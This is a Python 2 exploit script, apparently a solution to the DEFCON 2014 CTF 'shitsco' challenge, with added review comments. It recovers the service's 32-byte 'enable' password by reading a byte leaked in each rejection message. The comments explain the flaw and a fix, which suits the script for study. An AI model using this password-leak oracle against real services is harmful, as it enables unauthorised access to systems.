DEFCON 2014 Writeup shitsco
from struct import pack
from socket import *
from pwn import process
# NOTE(review): this is Python 2 (print statements, str-based socket I/O).
# NOTE(review): the page lost the script's indentation; the loop nesting below
# is reconstructed from statement order and should be checked against the
# original gist.
# NOTE(review): `pack` is not used by any statement here, and `process` is only
# referenced by the disabled local-run line below.

# Local-binary variant, left disabled by the author:
#p = process("shit")
p = socket(AF_INET, SOCK_STREAM)
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
# Print the first data the service sends (at most 4096 bytes).
print p.recv(4096)

# Byte values of the already-known prefix of the guess; the literal is empty,
# so recovery starts at position 0.
current = [ord(i) for i in ""] #[1] * 31 #list
pos = len(current)
# Pad the guess to exactly 32 byte values, each unknown position starting at 1.
current += [1] * (32 - len(current))
# ASCII newline (10) and space (32). Only the commented-out branch below
# consults this list; presumably these bytes would break the
# "enable <guess>\n" command line -- confirm.
blacklist = [10, 32]

# One request per position: send the 32-byte guess, read the byte the reply
# discloses, fold it into the guess at `pos`, then advance.
#
# Defensive reading: the reply exposes a byte beyond the echoed 32-character
# guess, and the script treats that byte as a correction for the current
# position, so each position costs a single request.
# NOTE(review): presumably that byte is the service's comparison result lying
# next to an unterminated copy of the input -- confirm against the binary.
# Bounding/terminating the echoed copy and returning a constant failure
# message would remove the signal.
while pos < 32:
    string = "".join(chr(i) for i in current)
    p.send("enable " + string + "\n")
    s = ""
    # Accumulate the reply until the rejection message has started to arrive.
    while not "The password" in s:
        s += p.recv(4096)
    # Printed inside a list so the repr shows non-printable bytes.
    print [s]
    # Character at index 32 of the text following "The password isn't ", i.e.
    # one past a 32-character echo. Raises IndexError if that much of the
    # reply has not been received yet.
    ret = ord(s.split("The password isn't ")[1][32])
    # Add the disclosed value to the guess at this position.
    # NOTE(review): no wrap-around handling; chr() above raises ValueError if
    # an entry leaves 0..255.
    current[pos] += ret
    pos += 1
    # Earlier step-by-one variant, left disabled by the author:
    #if ret == '\x01':
    #    current[pos] += 1
    #    if current[pos] in blacklist:
    #        current[pos] += 1
    #elif ret == '\xff' :
    #    current[pos] -= 1
    #    pos += 1
    # Progress output: the guess as a list of byte values.
    print current
    #current[pos] += 1